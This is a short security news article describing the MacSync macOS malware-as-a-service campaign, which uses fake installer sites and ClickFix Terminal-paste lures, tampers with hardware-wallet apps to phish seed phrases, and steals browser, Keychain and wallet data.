A new cyber threat campaign has emerged in the macOS ecosystem, relying not on sophisticated exploits but rather on tried-and-true social engineering tactics. Behind this threat is the MacSync malware, which is being distributed via a Malware-as-a-Service (MaaS) model—an inexpensive service catering to cybercriminals, including less experienced but highly active malicious actors. MacSync disguises itself as an installer for cloud storage services and spreads through websites that bear a striking resemblance to legitimate download portals. In one instance documented by CloudSEK experts, the user was initially redirected from a page imitating a Microsoft account login form, and subsequently to what appeared to be the “official” site for a macOS application. No suspicious files were immediately offered. Instead, visitors were presented with an error message recommending an “advanced installation method” via the Terminal.
What followed was a classic ClickFix maneuver. The user was essentially persuaded to copy and paste a single command line, purportedly necessary to complete the setup or rectify a failure. While the command appeared harmless, it secretly downloaded and executed a remote malicious script. Because this action was executed voluntarily by the user, macOS perceived nothing unusual—standard protections like Gatekeeper and signature verification simply did not trigger.
After installation, MacSync is slow to reveal its presence. The malware operates discreetly, prioritizing prolonged system persistence. One of its primary functionalities involves tampering with popular Electron-based applications used for hardware cryptocurrency wallets, such as Ledger Live and Trezor Suite. The modified versions maintain their legitimate appearance but, at a critical juncture, display “service” screens to the user, reporting failures and suggesting a recovery process. This scenario can activate even weeks after initial infection. The user is then prompted to enter their PIN and seed phrase, allegedly to fix the perceived issue, at which point adversaries gain complete control over the crypto assets. Effectively, a trusted application is transformed into a meticulously crafted phishing instrument.
Despite being marketed as a “cheap MaaS solution,” MacSync’s capabilities are quite formidable. The malware possesses the ability to exfiltrate browser data, information related to cryptocurrency wallets, the contents of Keychain, and various files. This makes it a significant risk not only for individual users but also for corporate devices where macOS is increasingly utilized as a work platform.
About the Author
